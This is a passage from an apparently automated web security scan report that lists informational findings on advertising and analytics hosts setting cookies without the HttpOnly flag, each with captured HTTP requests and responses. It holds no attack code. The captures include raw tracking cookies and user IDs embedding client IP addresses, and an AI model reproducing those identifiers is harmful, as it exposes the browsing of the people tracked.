Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:51 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

18.208. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p90175839&PRAd=3992125865291152&AR_C=6108753 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=16&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 15:19:44 2011&prad=253732016&arc=207615354&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303658384%2E204%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 15:20:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90175839=exp=1&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:22 2011&prad=3992125865291152&arc=6108753&; expires=Sat 23-Jul-2011 15:20:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26791

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"3992125865291152",Pid:"p90175839",Arc:"6108753",Loca
...[SNIP]...

18.209. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:49 2011&recExp=Sun Apr 24 12:09:49 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646989; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24700

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...

18.210. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p86204458&PRAd=60003739&AR_C=40736478 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com
Cookie: ar_p86169922=exp=2&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:03 2011&prad=57789606&arc=41386432&; BMX_G=method->-1,ts->1303663677; BMX_3PC=1; UID=e9305be3-24.143.206.75-1303663678

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:48:19 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86204458=exp=1&initExp=Sun Apr 24 16:48:19 2011&recExp=Sun Apr 24 16:48:19 2011&prad=60003739&arc=40736478&; expires=Sat 23-Jul-2011 16:48:19 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28564

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"60003739",Pid:"p86204458",Arc:"40736478",Location:CO
...[SNIP]...

18.211. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p81479006&PRAd=58779362&AR_C=40314462 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=728leader;tile=1;sz=728x90;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:49:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p81479006=exp=1&initExp=Sun Apr 24 19:49:07 2011&recExp=Sun Apr 24 19:49:07 2011&prad=58779362&arc=40314462&; expires=Sat 23-Jul-2011 19:49:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303674547; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27406

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58779362",Pid:"p81479006",Arc:"40314462",Location:CO
...[SNIP]...

18.212. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p86169922&PRAd=57789606&AR_C=41386432 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:47:57 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86169922=exp=1&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:47:57 2011&prad=57789606&arc=41386432&; expires=Sat 23-Jul-2011 16:47:57 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303663677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24532

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57789606",Pid:"p86169922",Arc:"41386432",Location:CO
...[SNIP]...

18.213. http://asset.userfly.com/users/49267/userfly.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/49267/userfly.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/49267/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 6
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=3605dc32-6eab-11e0-991b-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 0


18.214. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=93909&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


18.215. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&rn=1429219633&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fwww.neudesicmediagroup.com%252FAdvertising.aspx%253Fsite%253DSilverlight%26r%3D&c3=1234567891234567891&c9=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&r=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 15:57:30 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 15:57:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


18.216. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 12:29:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

18.217. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=pcwmw-pcworld&d.x=192052059&d.t=page&d.u=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 19:51:35 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 19:51:35 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

18.218. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735207&c4=186884836&c5=1&c6=1&c7=Sun%20Apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.hotelclub.com%2Fcommon%2FadRevresda.asp%3Fchannel%3Dhome%26Section%3Dmain%26adsize%3D728x90%26pos%3Dbottom&c9=&c10=http%3A%2F%2Fwww.hotelclub.com%2F&c15=&1303646992514 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Tue, 23-Apr-2013 12:09:49 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


18.219. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 15:25:07 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Mon, 23-Apr-2012 15:25:07 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Sun, 24 Apr 2011 15:25:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


18.220. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

18.221. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=44536&rnd=288817.4828887202 HTTP/1.1
Accept: */*
Accept-Language: en-US
